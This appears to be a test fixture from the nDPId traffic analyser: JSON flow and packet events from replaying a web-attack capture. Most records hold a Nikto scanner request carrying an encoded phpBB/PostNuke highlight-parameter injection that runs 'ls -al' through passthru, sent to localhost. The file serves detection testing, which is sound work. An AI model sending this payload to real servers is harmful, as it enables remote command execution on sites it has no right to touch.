+00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1576420277794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277794,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgStAAEAGumR\/AAABfwAAAcbsH5DtZbgCN0MtSoAYAED\/WgAAAQEICp1m\/0qdZv9KR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001394)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1576420277795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277795,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgfFAAEAGuZ5\/AAABfwAAAcbuH5ChILjHXT7L3YAYAED\/WgAAAQEICp1m\/0udZv9LR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NSkNCg0K"} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001395)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00859{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1576420277797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277797,"pkt":"AAAAAAAAAAAAAAAACABFAAFPlMhAAEAGpt5\/AAABfwAAAcbwH5AHpq3wv20OaIAYAED\/QwAAAQEICp1m\/02dZv9NR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001396)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1576420277799,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277799,"pkt":"AAAAAAAAAAAAAAAACABFAAFm4IpAAEAGWwV\/AAABfwAAAcbyH5CWqtmi9bUd64AYAED\/WgAAAQEICp1m\/0+dZv9PR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1576420277800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277800,"pkt":"AAAAAAAAAAAAAAAACABFAAFvelxAAEAGwSp\/AAABfwAAAcb0H5AcBENxXyULZYAYAED\/YwAAAQEICp1m\/1CdZv9QR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1576420277802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277802,"pkt":"AAAAAAAAAAAAAAAACABFAAF0IClAAEAGG1l\/AAABfwAAAcb2H5CLkRkOnTgF7oAYAED\/aAAAAQEICp1m\/1GdZv9RR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KDQo="} +01239{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1576420277803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277803,"pkt":"AAAAAAAAAAAAAAAACABFAAFudhVAAEAGxXJ\/AAABfwAAAcb4H5C7R086db2J2oAYAED\/YgAAAQEICp1m\/1OdZv9TR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1576420277804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277804,"pkt":"AAAAAAAAAAAAAAAACABFAAFsoC9AAEAGm1p\/AAABfwAAAcb6H5AztpkH42OkkoAYAED\/YAAAAQEICp1m\/1SdZv9UR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1576420277807,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277807,"pkt":"AAAAAAAAAAAAAAAACABFAAFsAqdAAEAGOON\/AAABfwAAAcb8H5ASjTuPR79V4YAYAED\/YAAAAQEICp1m\/1edZv9XR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 